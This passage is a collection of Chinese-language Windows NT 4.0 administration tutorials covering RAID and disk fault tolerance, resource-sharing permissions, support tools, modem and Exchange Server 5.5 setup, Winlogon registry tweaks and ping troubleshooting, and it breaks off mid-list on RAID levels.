     以下介绍带奇偶校验的带区集中的某一个硬盘发生故障后的修复方法。因为带奇偶校验的带区集具有容错功能，所以当其中一个硬盘发生故障时，系统仍然能够正常工作，只是速度明显减慢，为了保证数据访问的速度，必须对出现故障的硬盘进行修复。其修复方法如下：
    ●首先换掉已出故障的硬盘，添加一个新硬盘，并进行相关参数的设置。
    ●启动计算机并进入“磁盘管理器”窗口，在新安装的硬盘上创建一块可用空间，此可用空间的大小应等于或大于故障盘或带区集中其他硬盘上对应空间的值。
    ●选定带奇偶校验的带区集（当一个硬盘出故障时，带区集仍然存在），按住Ctrl键不放，再选取新安装硬盘中所建的可用空间，接着选择“容错”菜单下的“再生”选项即可完成修复工作。
    ●重新启动计算机后，带奇偶校验的带区集又恢复到正常的工作状态。
     2.磁盘镜像和双工技术
     磁盘镜像和双工是中小型网络中经常使用的另一种容错技术。如果两个硬盘同时接在同一个硬盘控制卡上便称为磁盘镜像，当两个硬盘分别连接在不同的两个硬盘控制卡上时称为磁盘双工。因为在磁盘镜像中存在谁镜像谁的问题，所以应将系统中原有的一个硬盘或已存放数据的一个硬盘作为主盘（Master），而把被镜像的一个硬盘作为从盘（Slaver），在硬件连接时也要注意这一点（注意：硬盘下所标的Master和Slaver表示连接硬盘时，通过跳线方式将其设置成为主盘或从盘方式，而不具体代表这里所讲的镜像关系）。磁盘镜像和双工在Windows NT中的软件设置方法完全相同，只是在硬件的连接上有所差异，一般情况下建议大家使用磁盘双工技术。
     ●创建镜像磁盘。启动系统进入“磁盘管理器”窗口，在从盘上创建一块可用空间，其大小应等于或大于主盘（镜像盘）上对应分区的空间。先选定主盘上的镜像分区，按住Ctrl键不放，再选定从盘的可用空间作为被镜像分区。接着选择“容错”菜单下的“创建镜像”选项，并执行“磁盘分区”菜单下的“立即更改”功能项后创建完成。重新启动系统，你会发现主盘与从盘之间会有一个较长时间的初始化过程，初始化结束后镜像磁盘开始投入工作（两个具有镜像关系的分区用粉红色显示）。
     ●中断镜像关系。如果你要中断已建立的镜像关系，可通过“容错”菜单下的“中断镜像”选项来完成，还要经过“磁盘分区”菜单下的“立即更改”来确认。重新启动系统后，原有的镜像操作被中断。
     ●镜像磁盘的故障修复。任何物理设备都有可能发生故障，当镜像磁盘中的一个分区出现故障时，虽然计算机仍然可以正常运行，但是这时的硬盘已失去了容错功能，必须将其恢复。恢复时先中断原有的镜像关系，再重新建立新的镜像。
     最后还需提醒一点，每次对硬盘进行以上的相关操作后，都需使用RDISK.EXE程序对“紧急修复磁盘”的内容进行更新，以确保系统出现启动故障时使用“紧急修复磁盘”来修复。

返回


Windows NT卷集和带区集的建立及应用

《一键清理系统垃圾》

Windows NT卷集和带区集的建立及应用

     创建卷集的目的是为了更加有效的利用硬盘空间。创建卷集的具体方法：
     ●假定有4个分别分布于3个硬盘中的可用空间，先选定第一个可用空间，接着按住Ctrl键不放，用鼠标依次点取其它的可用空间。
     ●当所有要纳入卷集的可用空间（不能包括已创建的主分区和逻辑驱动器）选定后，通过“磁盘分区”菜单下的“创建卷集”选项，可将所选可用空间的全部或部分创建成为一个卷集，并经“立即更改”这一步的操作后卷集创建成功。
     ●重新启动计算机，在“磁盘管理器”窗口中对所建卷集进行“格式化”操作。格式化时，卷集中所有的分区同时进行，结束后每个分区都有一个相同的驱动器名。
     ●其中J驱动器就是已建立的一个跨越3个硬盘的卷集，你可以像使用其它类型的驱动器一样来使用J驱动器。
     2.带区集的特点和建立方法
     建立带区集的目的是为了提高整个硬盘系统的读取和写入能力。在进行数据读写操作时，带区集中的所有硬盘都会同时工作，所以带区集比单硬盘系统具有更快的数据访问速度，但是它不具备系统容错功能。下面是带区集的建立过程：
     ●选取第一个可用空间（带右斜线的部分），按住Ctrl键不放，分别在其他硬盘中各选定一个可用空间。
     ●选择“磁盘分区”菜单中的“创建带区集”选项，在出现的对话框（类似于图2）中输入所创建带区集的大小，再经“磁盘分区”菜单中的“立即更改”选项，带区集便建立完成。
     ●利用“工具”菜单中的“格式化”选项对新建的带区集进行格式化，结束后才能正常使用。
     ●最后还可利用“磁盘分区”菜单中的“删除”选项删除已建立的带区集。
     3.卷集和带区集的区别
     卷集和带区集是Windows NT中管理硬盘时常用的两种方法。不过，两者之间不尽相同：
     ●采用卷集的目的是为了更加有效的利用硬盘空间，而使用带区集的目的则是提高硬盘系统的读取和写入能力。
  ●在一个硬盘中，卷集可使用两个以上的分区，而带区集只能使用其中的一个。
     ●在建立卷集时，每个分区的大小不必相同，但是在建立带区集时一般应要求相同，最起码相差不能太大。
     ●卷集在工作时，数据先存放在第一个分区或硬盘中，等存满后再存入第二个分区或硬盘，依次类推。而当数据保存到带区集时，先将数据分成大小为64K的数据块，然后再将这些数据块分别存放到每个分区内。
     ●不管是卷集还是带区集，当其中一个分区出现故障时，整个数据将全部丢失。

返回


Windows NT网络的资源共享

《一键清理系统垃圾》

Windows NT网络的资源共享

    计算机网络中的资源共享是网络建设的最初始也是最重要的意图之一，在不同的网络系统中对计算机资源共享的管理方式不同，权限设置也不同。在以Windows95为客户端的Windows NT网络中的资源共享控制有两种方式：共享级访问控制和用户级访问控制，这两种访问控制方式为用户管理共享资源提供了极大的方便。
    “共享级访问控制”是基于口令的资源共享访问控制方式。在这种方式下，用户可以为所有允许共享的文件设置所允许的访问权限如：只读、完全和根据口令访问，并可以为各种资源的不同访问权限设置口令。这样，所有在同一个网络环境的不同用户，只要知道口令，就可以按照事先设定的相同权限对同一资源进行访问。“共享级访问控制”的设置方式如下：
    1.打开“控制面板”，双击“网络”图标，然后单击其中的“访问控制”标签，确认“共享级访问控制”项被选中，然后单击确定。(若是由“用户级访问控制”改变到“共享级访问控制”则计算机会自动要求重新启动)
    2.用鼠标右键单击要设置成允许共享的文件夹或驱动器，选择弹出菜单中的“共享”，在出现的窗口中选中“共享为”，则窗口中的“共享名”、“备注”、“访问类型”和“口令”文本框均被激活。
    3.“访问类型”栏中共有三种访问类型：
    ■只读
    用户只能从设置成只读的文件夹或驱动中读文件或将文件复制到自己的计算机中，但是不可以对原文进行修改和删除，即不能对原文进行写操作。还可以对设置成只读的文件夹或驱动器设置“只读口令”，这样其它用户在访问该文件夹或驱动器时必须先输入口令。
    ■完全
    用户可以对这一类文件夹中的文件进行包括修改和删除在内的各种读写操作。同样可以对这些驱动器或文件夹设置“完全访问口令”，并将口令告诉拥有完全访问权限的用户。
    ■根据口令访问
    在“只读”和“完全”两种类型中的口令可以不设置，但是在“根据口令访问”类型中必须分别设置“只读口令”和“完全访问口令”，并将不同的口令告诉拥有不同权限的用户。
    “共享级访问控制”使用方便，设置简单，特别适用于允许大量用户共享某一资源的情况，但是“共享级访问控制”方案对访问权限的管理不太完善，资源拥有者必须将口令告诉用户才能使他们能够访问相应的资源，而当访问口令被扩散时，对访问权限的控制也就不复存在。在对访问权限有严格要求的情况下，我们还是应该使用“用户级访问控制”方式。
    “用户级访问控制”是基于Windows NT对域用户管理的资源共享访问控制方式，在这种方式下资源拥有者可以设置允许访问该资源的网络用户名称，并可以对每位用户的访问权限进行更加详细的设置，这样每位用户对相同的资源将拥有不同的访问权限。由于网络用户的信息由网络操作系统Windows NT进行管理，因此“用户级访问控制”拥有更安全、更严格的资源共享权限管理。“用户级访问控制”的设置方式如下：
    1.打开“控制面板”，双击“网络”图标，然后单击其中的“访问控制”标签，确认“用户级访问控制”项被选中，在“用户和组的列表来自：”文本框中填入本计算机所属的域的名称，然后单击确定。(若是由“共享级访问控制”改变为“用户级访问控制”则计算机会自动要求重新启动)
    2.用鼠标右键单击要设置成允许共享的文件夹或驱动器，选择弹出菜单中的“共享”，在出现的窗口中选中“共享为”，则窗口中的“共享名”、“备注”等文本框均被激活。
    3.用鼠标单击“添加”按钮，将出现“添加用户”窗口。在窗口的左侧显示的是资源拥有者所在域中的全体用户列表，可以分别对不同的用户进行不同的权限设置。
    ■只读
    在窗口左侧选中某用户，然后单击“只读”按钮，该用户将被添加到窗口右侧相应的栏目中，然后按“确定”。这样当该用户登录到Windows NT的相应域中时将自动拥有对该资源的只读访问权限。
    ■完全访问
    在窗口左侧选中某用户，然后单击“完全访问”按钮，该用户将被添加到窗口右侧相应的栏目中，然后按“确定”。这样当该用户登录到Windows NT的相应域中时将自动拥有对该资源的完全访问权限。
    ■自定义
    在窗口左侧选中某用户，然后单击“自定义”按钮，该用户将被添加到窗口右侧相应的栏目中。当按下“确定”按钮后将出现“更改访问权限”窗口，在其中允许为用户自定义访问权限，可选择的访问权限有：读入文件、写入文件、创建文件和文件夹、删除文件、更改文件属性、文件清单和更改访问控制等7项，选择完毕后按“确定”按钮。这样当该用户登录到Windows NT的相应域中时将自动拥有对该资源的自定义的访问权限。

返回


Windows NT系统崩溃时可借鉴的工具

《一键清理系统垃圾》

Windows NT系统崩溃时可借鉴的工具

      Windows NT是一个可靠性比较高、水平也比较先进的操作系统，也可说是最先进、最可靠的系统之一。但任何操作系统都有可能出现无法工作的时候。Windows NT也不例外。而且它作为一种最复杂的系统，可能不时地会崩溃，甚至是相当严重的崩溃，让人束手无策。如果出现这种严重情况，下面介绍的一些工具或许会对用户有所帮助。

    在Windows NT的CD－ROM版本中，存有许多工具软件，它们可以在系统崩溃时起到一定作用。它们存放在目录＼SUPTOOLS下。下面将一一介绍。

    1．NTDETECT

    此项命令在机器起动期间出现系统拒绝检测硬件这样的故障时，可以用来帮助进行硬件故障调试。此命令实际上用作一个.COM文件和.CMD批文件。NTDETECT拥有这样一种机制，在系统启动期间，可以对于Windows NT检测到的起动信息进行数据转储。使用NTDETECT，对信息进行了转储之后，可以判断故障来源到底是不是因为没有找到其部件。

    2．SMBTRACE

    这是一个字符型的应用程序。它能够捕获来自服务器、信道指示器的SMB信息，并对于信息的捕获方式、捕获程度及是否影响到系统性能加以控制和选择。它作为一个服务器消息快跟踪程序，对于帮助网络专家判定网络故障，起到了巨大的作用，或者从某种角度讲，有网络探测器的作用。

    3．I386KD.EXE及MIPSKD.EXE

    这两个软件作用主要是能识别并显示出Windows NT内核中的故障情况。它们作为内核调试器，可以算是操作系统制造商赋予软件的最不寻常的工具。它们具有极强的功能，其各种使用远远超出本书范围。

    简单来说，要使用内核调试器的话首先要用调制解调器或空（null）的调制解调器电缆将要调试的机器与另一台计算机联接，在另一台计算机上运行调试软件，在被测试的机器上进行内核测试。仅仅这样讲述，可能用户还没法学会使用这些软件，不过他们可以借助Windows的系统开发工具箱（System DeveloPment Kit）或微软的工具箱，以便了解更多情况。在CD－ROM中，\SUPTOOLS目录下有一个文件SUPTOOLS.HLP，它含有各工具的帮助信息。不过对于此命令，谈得很简单，只有几行帮助信息。

    4．PMON.EXE

    这是一个字符型的文件。其任务是对进程资源进行监测，给出进程执行的详细信息，包括线流统计、工作集的大小及其它内容。与Windows NT的性能监控程序相比，它不仅能完成NT性能监控的功能，还多提供了一种可选的用户接口，因此提供的信息也更加详细、全面。

    5．PVIEWER.EXE

    这是一个图形程序。其功能与PMON.EXE一致，也提供了有关进程的详细信息。它也包括了Windows NT性能监控器的功能，只是为用户提供了一个可选的用户接口。

    6．DRIVERS.EXE

    此程序功能为显示设备驱动软件的信息。它对于访问低层次的硬件设备以调试故障，极有帮助。

    7．EXETYPE.EXE

    此程序功能为显示一个可执行文件的类型及其子系统。它是一个简单的程序，只有几个命令行。当系统运行某可执行文件出现故障时，可键人命令: exetype＜文件名.EXE＞其中文件名指出问题的可执行文件名。这时，命令将详细说明当前程序是什么程序，是Windows NT，OS/2，还是16位Windows NT程序，它指定了什么样的指令集，这些信息对于查明故障原因可能有帮助。

    8. PSTAT.EXE

    这是一个字符型的程序。其功能是显示所有正在系统中运行的程序及其状态信息。

    9．REGINI.EXE

    这是一个命令行程序。其功能是用改变命令稿（scriPt）的方法来改变注册处的命令。如果想要修改各个系统的注册处内容，可以使用注册处命令稿，并在命令行中执行命令REGINI.EXE。这也就说明，利用系统的登录命令稿，可以同时改变多个系统的注册处内容。

    不过，此命令功能虽强，危险性也不小（和注册处编辑器类似）。在改动文稿时，就同时变动了多个注册处，但同时也像机关枪扫射一样，改动了所有的服务器（或工作站），故使用时要慎之又慎。在微软中，没有提供注册处的手稿格式。不过在FIFO.OFF及FIFO.INI文件中，可以找到一些相关的注册处文稿格式。那些文件与FIFO.CMD文件有关，放在CD上的目录SUPPORT/SUPTOOLS/I386中。不过，再次提醒用户，使用此命令时要慎用。在使用REGINI.EXE功能前，要先在单个的Windows NT工作站上试验一下，确信所做的修改不会造成系统重启动后，再正式作用于别的系统，尤其是服务器上。这样才能确认修改是安全的。

    10．FIFO.CMD

    这个文件实际上是批处理文件。其功能是使调制解调器在需要时支持先入先出的缓冲方式。这一功能还可以通过注册处编辑器的一系列等价操作实现，亦可以由“ControlPanel”在“Ports”中加以设置。在这里提到多次字符型文件，其目的是强调，这些文件可以在ScriPt手稿文件中运行。

  Microsoft对于这些工具，向人们提出了如下建议：

    “这些工具是作为MicrosoR Product SuPPort Services的内容而开发的，只计划用于在Microsoft系统支持工程师的指导下进行故障诊断。其它任何用途都属于冒险的行为。另外，提供的这些工具也没有任何授权。Microsoft不承认用它们做任何商业上的保证或其它特定目的。

    当用户真得在利用这些工具对某些故障进行测试时，最好能拥有Tech Net CD或ComPuserver上的微软知识库；Microsoft Knowledge Base，这里存放的信息会对用户有指导信息。不过，当用户遇上了一个以前无人遇上的问题（比如在刚刚装入Windows NT的时刻）时，这时候的Knowledge Base中将不会找到任何参考信息，因为这时知识库中的支持信息太少了。这时最好不要一个人绞尽脑汁，还是去请教一下工程师们，尤其是对于那些低层次的故障。

返回


WinNT中安装内置MODEM

《一键清理系统垃圾》

WinNT中安装内置MODEM

    为提前感受Windows2000，我最近在自己的一台电脑上安装了WinNT4.0，作为主域服务器（仅安装NT操作系统）。由于WinNT4.0不如Win98“聪明”——不支持即插即用，因此只有自己动手，一步步安装硬件驱动程序。安装声卡、显卡还挺顺利，安装MODEM（笔者使用的是Comstar 56K双频内置MODEM，ESS芯片）时却遇到了一点小麻烦。
    凭借多次Win9X中安装MODEM的经验，并参照NT的帮助文件后，我信心十足地点击“开始”→“程序”→“管理工具（公用）”→“向导”，启动“安装新的调制解调器”向导。选中“不检测调制解调器”项，单击“下一步”→“从磁盘安装…”，插入驱动盘，指明路径，选中INF文件，打开后即发现将要安装的MODEM。接下来，系统提供COM1口和COM2口供选择。考虑到COM1口可留给鼠标，便选了COM2口。安装完毕，打开“控制面板”→“调制解调器”，显示出已添加的MODEM，一切OK！
    重新启动计算机，怀着喜悦的心情打开“超级终端”程序进行测试，键入AT指令，居然毫无反应。难道是设备冲突（已排除MODEM自身因素）？于是将已添加的MODEM删除，重新安装，这次选择COM1口，但问题依旧，且系统并未给出任何设备故障提示。看来问题应该出在驱动程序上。回想起该MODEM在Win9X中使用的是由驱动程序自行添加、配置的COM4口……，难道是两个驱动程序安装方法有所不同？赶紧打开驱动程序光盘，找到NT驱动程序所在位置，发现除INF、SYS等文件外，还有Setup.exe和Readme.txt文件。查看Readme.txt文件得知，在安装此MODEM之前，必须先运行Setup.exe（NT COM端口设置程序），进行EDSP硬件设置——添加COM端口，系统即可自动检测到MODEM。
    再次删除已安装的MODEM，运行Setup.exe后，按其默认选项配置COM4口（也可选择其它端口，我未尝试）。紧接着，打开“控制面板”→“调制解调器”，安装时不选择“不检测调制解调器”项，令系统自动检测。不一会，系统就完成了安装。
    随后，运行“超级终端”，键入指令ata，回车，终于听到了熟悉的“猫”声。现在，可以潇潇洒洒地上网遨游了。

返回


安装电子邮件服务Exchange Server 5.5

《一键清理系统垃圾》

安装电子邮件服务Exchange Server 5.5

电子邮件服务Exchange Server 5.5 是用于设置局域网的电子邮件功能的必备服务软件，要知道，它可以把你的局域网设置成和网上的电子邮件一样的格式和功能（真不简单），如你的地址是：webmaster@complate.com，你的老总是：LaoZong@complaate.com，不错吧？开始安装吧！
1）将Exchange服务器软件的光盘放入光驱；
2）找到和你的处理器相适合的Setup.exe程序。Setup.exe程序位于这样的目录下<drive>：\SERVER\SETUP\<processor>,(<drive>是光驱的盘符，<processor>是相应处理器的目录名，如果是Intel平台（即NT）的计算机，正确的Setup.exe位于I386目录下；
3）执行Setup.exe,单击接受继续；
4）安装到缺省目录，典型安装；
5）出现许可权模式选项，选择“单主域（Per seat)”模式，继续；
6）出现组织和站点对话框后，选择创建新站点。输入complate作为组织名，mail作为站点名。（注：电子邮件的格式是：“用户名@域名.组织名.com”。
7）接下来的对话中，您可以结束并退出安装或者运行性能优化器，运行性能优化器。其它使用缺省设置。
安装完毕。

返回


拨号 Internet 邮件服务主机配置

《一键清理系统垃圾》

拨号 Internet 邮件服务主机配置

本文目的

本文的目的是：加深您对配置 Microsoft? Exchange Server 5.5 版使之提供多个电子邮件域的了解，并提高操作的熟练程度。

本文主要面向那些已对 Microsoft? Windows NT? 网络、Microsoft Windows NT 远程访问服务 (RAS)、Microsoft? TCP/IP、Microsoft Windows NT 域及 Microsoft Exchange Server 5.5 版等软件有一定使用经验的读者。

概述
前提条件
术语和缩略语
配置
配置客户端拨号 Internet 邮件服务
_
Microsoft Exchange Server 5.5 中的 Internet 邮件服务能够提供多个 SMTP 电子邮件域。它与智能主机上的 sendmail 守护进程的功能相同。因而，那些拥有到 Internet 的高带宽连接的“Internet 服务提供商”(ISP) 可为客户公司接收、存储和转发电子邮件。而后，客户公司即可配置其 Exchange Server 5.0 SP1 或更高版本的 Internet 邮件服务，以便通过调制解调器拨入 ISP，接收自己的电子邮件。

TCP/IP 网络配置是关键环节。本文示例使用的网络 IP 地址是 192.168.100.n，这里的“n”用来标识主机，其值是从 1 至 254。需要强调的是，在拨号客户首次访问 Microsoft Windows NT RAS 服务器时，安装在该服务器上的每个调制解调器就会被分配一个 IP 地址。在服务器下次重启前，调制解调器都会一直保留这个地址。Microsoft Windows NT Server 从地址池中的第一个 IP 地址开始，按升序分配这些地址。因而，Microsoft Premier Support 建议您从 IP 地址池中的最后一个地址开始，按降序分配客户端 IP 地址。因而，对于从 192.168.5.1 至 192.168.5.254 IP 地址池，第一个客户分配的 IP 地址是 192.168.5.254，第二个客户是 192.168.5.253，依次类推。这样即可消除调制解调器添至主服务器时带来的任何潜在冲突。

主服务器运行的必须是 Microsoft Exchange Server 5.5 版或更高版本。客户端服务器运行的必须是 Microsoft Exchange 5.0 Service Pack 1 (SP1) 或 Microsoft? BackOffice? Small Business Server 4.0 或更高版本。客户公司要获得有效的电子邮件域，则必须注册或使用 InterNIC Registration Services 注册。检查 http://www.internic.net/，可确认要用的电子邮件域是否已为其它公司所用。ISP 必须给每个客户公司分配一个“静态 IP 地址”和“域名服务 (DNS)”中的有效“主机 (A)”和“邮件交换器 (MX)”记录。客户公司的 MX 记录必须指向由 ISP 维护的 Microsoft Exchange Server 5.5 计算机。因而，从 Internet 上发往客户公司的电子邮件先由 ISP 接收并保存，直到客户端 Internet 邮件服务连接到 ISP 网络，提取为其电子邮件域保存（排队）的电子邮件。

“A”记录
它用于标识含 IP 地址的主机名的 DNS 记录。

客户端
在本文中，客户端指运行 Microsoft Exchange Server 5.0 SP1 或更高版本 Internet 邮件服务（拨入 ISP 以下载电子邮件）的计算机。

DNS
域名系统，它是一种查找 Internet 上主机和域的方法。

DUN
拨号网络

电子邮件
电子形式的邮件。

ESMTP
扩展的简单邮件传输协议。

ETRN
ESMTP 命令，它提示 ESMTP 网关或邮件主机处理等候发往其它 SMTP 邮件处理系统的电子邮件。

主机
在本文中，主机指运行 Microsoft Exchange Server 5.5（由 ISP 维护）的计算机。

Internet 邮件服务
Microsoft Exchange Server Internet 邮件服务，它是一个 SMTP 网关。

ISP
Internet 服务提供商。

MX 记录
一条 DNS 记录，定义了给定域的邮件交换器。

RAS
远程访问服务。

SMTP
简单邮件传输协议。

SP
Service Pack。

配置 Microsoft Exchange Server 5.5 使之存储 SMTP 邮件，以便供其它 Exchange 拨号 Internet 邮件服务提取，它包含以下五个基本步骤：

通过 InterNIC 获得一个有效的电子邮件域。
配置客户端 DUN。
配置客户端 Internet 邮件服务。
配置主机 RAS 服务。
配置主机 Internet 邮件服务。
双击桌面上的我的电脑图标。
双击拨号网络。
单击新建，然后添加 ISP 的电话簿项目。
单击其他。

如果浏览器不支持内嵌框，则可单击此处，查看单独的页面。

单击“编辑项和调制解调器属性”。
单击“服务器”选项卡，然后单击“TCP/IP 设置”。当出现“PPP TCP/IP 设置”对话框时，单击“指定 IP 地址”，然后键入 ISP 分配给您的 IP 地址。其它设置保持默认值。单击“确定”。

启动客户端服务器上的 Exchange Server Administrator 程序，配置 Internet 邮件服务的拨号连接。选择要拨到 ISP 的电话簿项。配置 Schedule 和 Dial 属性，满足客户公司的电子邮件需求。单击 OK。

如果浏览器不支持内嵌框，则可单击此处，查看单独的页面。

单击 Mail Retrieval，确认选定了默认选项，即 Retrieve mail using ETRN 和 Derive from routing property page。单击 OK。

如果浏览器不支持内嵌框，则可单击此处，查看单独的页面。

单击 Logon Information，输入由 ISP 指定的帐户信息。单击 OK。

单击 Routing 选项卡，确认 Reroute incoming SMTP mail (required for POP3 support) 选项已被选中，如下图所示。确认 Sent to 域信息与所注册的电子邮件域相同。单击 OK。

如果浏览器不支持内嵌框，则可单击此处，查看单独的页面。

单击 Connections 选项卡，然后单击 Forward all messages to host。键入 ISP 的 Exchange Server 计算机的 IP 地址。选中 Dial using 复选框，然后选择您的 ISP 的电话簿项。单击 OK。

如果浏览器不支持内嵌框，则可单击此处，查看单独的页面。

停止并重启 Internet 邮件服务。
读取“RAS Server TCP/IP Configuration”对话框。

打开控制面板，双击网络图标，单击服务选项卡。
在网络服务下，选择远程访问服务。
单击使用静态地址池，然后输入静态地址池。当客户端 Internet 邮件服务连接提取邮件时，该地址池将仅由客户端 RAS 会话使用。因而，不必在该地址池中使用有效的 Internet IP 地址。唯一的网络连接是在主机 Internet 邮件服务与客户端 Internet 邮件服务之间。
选择允许远程客户端请求预设的 IP 地址复选框。该选项与拨号电话簿项一起，确保了客户端服务器每次连接到主机服务器时，都分配到相同的 IP 地址。这样，可保证主机服务器上的 Internet 邮件服务在拨号服务器请求提取邮件时，能够找到拨号服务器。
单击确定。

单击 Internet 邮件服务的 Connections 选项卡，然后单击 E-Mail Domain。

显示 E-Mail Domains 对话框后，单击 Add。

在 E-Mail Domain 框中，键入客户的注册电子邮件域，如下图所示。在注册的电子邮件域之前不应带有“at”符号 (@)。单击 Forward all messages for this domain to host，然后键入分配给客户公司的 IP 地址。选中 Queue messages for ETRN 复选框。单击 OK。

停止并重启宿主 Exchange Server 计算机上的 Internet 邮件服务。
可给客户域发送邮件，及将邮件从客户域发给 Internet，来测试该配置。

返回


不可不会的NT注册表修改技巧

《一键清理系统垃圾》

不可不会的NT注册表修改技巧

    在Windows 95/98中修改注册表文件是regedit.exe来进行编辑的，而在Windows NT中修改Registry数据库是使用两个版本的“注册表编辑器”：REGEDT32.EXE和regedit.exe来编辑注册表的，本文是使用REGEDIT32实用程序来对注册表进行编辑的。REGEDIT32可以在％system root％\system32目录下找到，REGEDIT程序则可以在％system％目录中找到。首先我们必须明确的是，当你对注册表进行改动时，注册表编辑的编辑器不使用任何语法或可靠的检测方法，也就是说编辑注册表是一种危险的操作。一旦对Registry做了不正确的改动后，可能造成系统不稳定或无法引导操作系统。本人建议在编辑注册表对注册表进行备份，磁盘实用工具允许用户备份注册表和修复任何可能发生的注册表问题。运行RDISK.EXE，它将生成一个文件，用户可以将该文件存贮在硬盘，软件盘或网络中的某个位置。在此之后，你还必须制作一个紧急修复盘（EBD）保存注册表系统部分信息，它可以使用户重新引导系统并使用注册表的备份。下面笔者将自己在使用NT时觉得十分有必要会的实用设置给朋友们说明一下，希望能给大家一些启示：

    (一)设置启动信息

    每次当Windows NT启动时，它都会显示"请按Ctrl＋Alt＋Delete键来登录"的信息，而你希望用户在按完Ctrl＋Alt＋Delete键后，画面上自动显示一些你希望用户看到的信息，则可以利用以下方法：

    （1）在“开始”、“运行”提示符输入REGEDT32，打开REGEDT32窗口（注册表编辑器）。

    (2)选择以下键值HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Curr－entVersion\Winlogon。

    （3）双击窗格右方的"LegalNoticeCaption"数值名称，当出现"字符串编辑器"对话框时，请在"字符串"文本框中输入信息对话窗口的标题，例如“警告”。双击右方的"LegalNoticeText"数值名称，当出现"字符串编辑器"对话框时，请在"字符串"文本框中输入信息窗口的内容，如：“请你不要试图登录NT服务器”。

    （4）注销（Logoff）后，重新登录（Logon），就可看到所设置的启动信息。

    (二)更改登录时的背景图案

    你可以选择登录时的背景图案，也就是设置当启动屏幕上出现"开始登录"对话框，并要求按"Ctrl＋Alt＋Delete"键以登录Windows NT网络时的背景图案，方法如下：

    （1）在“开始”、“运行”提示符输入REGEDT32，打开REGEDT32窗口（注册表编辑器）。

    （2）选择以下键值HKEY_USERS\DEFAULT\Control－Panel\Desktop

    （3）单击窗口右方的"Wallpaper"数值名称，当出现的“字符串编辑器”对话框时，请在"字符串"文本框中输入背景图案的图形文件名称，如C:\Winnt\Swimming Pool.bm。

    （4）双击窗口右方的"TileW－allpaper"数值名称，当出现“字符串编辑器”对话框时，请在"字符串"文本框中输入1（或其他非0的数值）。

    （5）注销后重新登录，你就会发现登录时的背景图案已改变。

    （三）不登录而直接关闭系统的方法

    当启动屏幕上出现“开始登录”的对话框时，你必须同时按“Ctrl＋Alt＋Delete”键，然后输入名称与密码，以便登录Windows NT Server。如果你此时并不想登录而直接关闭系统（ShutDown），其实大多数情况下是这样的（因为平时服务器只要启动起来就可以了），就是在其登录对话框中增加一个"关闭系统"的按钮选项。（注：在Windows NT Workstation4.0是自动出现此"关闭系统"的按钮，但是在Windows NT Sever4.0中则必须自己添加。）方法如下所示：

    （1）在“开始”、“运行”提示符输入REGEDT32，打开REGEDT32窗口（注册表编辑器）。

    （2）选择以下的键值HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Curren－tVersion\Winlogon

    （3）双击右方的"Shutdown－WithoutLogon"数值名称，当出现"字符串编辑器"对话框时，请在"字符串"文本框中输1。

    （4）注销后重新登录，在登录的画面上会多出一个"关闭系统"的按钮。

    （5）这时候只要你用鼠标单击“关闭系统”按钮，系统就会直接关闭。

    (四)不显示前一个登录者的账号名称

    当你要登录NTS，按下“Ctrl＋Alt＋Delete”键后，系统要求你输入用户名称和密码，WindowsNt缺省会自动将前一个登录者的名称显示在“用户名”框中，有时候你不希望显示此名称，则可以采用以下方法：

    （1）选择“开始”、“运行”对话框中输入“Reged32.exe”，启动注册表编辑器。

    （2）择以下键值HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Curre－ntVersion\Winlogon

    （3）双击“DontDisplayLastUserName”数值名称（如果没有此名称，则利用“编辑“菜单的“添加”数值命令进行添加，其数据类型为REG_SZ）。当出现“字符串编辑器”对话框时，在“字符串”文本框中输入1。

    （4）注销以后重新登录测试一下你刚才的设置。

    好了，都讲了这么多了。还不快快去试一试，让你的NTS为你更方便的服务吧？

返回


测试网络连接

《一键清理系统垃圾》

测试网络连接

    首先启动服务器，正常情况下，所有常用的服务都是自动启动的，如果有一些服务没有启动，则要人工启动了。方法是：在“程序－管理工具（公用）－服务管理器”里启动相应的服务。确认网线与HUB和工作站正确连接，HUB的电源要打开。
    然后，确保已经按照前面的教程，在服务器的用户管理栏里添加用户，为用户设定密码，其它采用默认设置。
    启动工作站，以在服务器里面设置的用户名登录，应该可以在“网上邻居”里看到服务器的名字及其它电脑的名字（用户名），表示网络连接成功了。

可能发生的故障：
    如果看不到其它的电脑，那么请检查所看不到的电脑的网络属性的访问控制是不是已经设成了共享级访问（要求共享级访问才能被其它计算机看到），如不是，方法是：选定“网上邻居”单击右键，选择“属性”，按“文件及打印机共享”将两个选项都选上。选择“访问控制”，选择第一个“共享级访问控制”，按“确定”，搞掂。另外，为了减少其它麻烦，请将工作站及服务器都设为同一个工作组。
    如果还是不行，请按下列步骤做，来确定错误的类型：
㈠ Ping 本地主机地址（127.0.0.1）。这让你知道你的 TCP/IP 是否正在工作或者TCP/IP协议是否安装正确。
㈡ Ping 网卡的 IP 地址（192.168.0.10)。如果Ping 本地主机地址正常，但这次不能工作，你就知道是网络配置不正确。
㈢ Ping 你的默认网关地址（192.168.0.1）。如果你能够 Ping 本地 IP 地址但是你的网关不响应，你可能有一个错误的网关地址，或者是网关上坏的端口，或者是网关没有工作或者配置错误。
Ping 一个远程的IP地址（如：其它工作站的IP地址）。如果你能够PING通网关但是不能PING通远程地址，你的网关设备（即服务器，我们的网关即为服务器）可能配置错误，或者没有正常工作，或者你的子网掩码没有正确设置。
    同时，可以检查网线是否保证完好，可用测线器测量一下，如果没有，就只能采取换网线的办法来排除网线的错误了。

返回


关于 磁盘管理器

《一键清理系统垃圾》

关于 磁盘管理器

    一、廉价磁盘的冗余阵列
    RAID——Redundant Arrays of Inexpensive Disks——廉价磁盘的冗余阵列

    RAID 共分五个级别，Windows NT 从软件上支持其中的 RAID 0、RAID 1、RAID 5 三个级别。RAID 五个级别的完整清单及其关键功能如下所示（出于方便，我们给出 Windows NT 支持的相应级别的名称）：

    RAID 0——Stripe Set（带区集）这是一个磁盘条带化技术，数据被条带化为穿过64K块的条带成员。RAID 0没有提供容错性。该级当前已在 Windows NT Workstation 和 Server 上实现。

    RAID 1——Mirror Set（镜像集）本级用于实现磁盘镜像或双工，是当今RAID技术应用中最普遍的形式。尽管RAID 1提供容错技术，但要实现这一技术，要对可用磁盘空间施加100%的压缩。本级当前已在 Windows NT Server 上实现。

    RAID 2——也是一个磁盘条带化技术，但是数据是在位级基础上条带化的，而不是以块级为基础。条带集中的一个磁盘是为数据恢复预备的。本级当前还没有在 Windows NT 上实现。

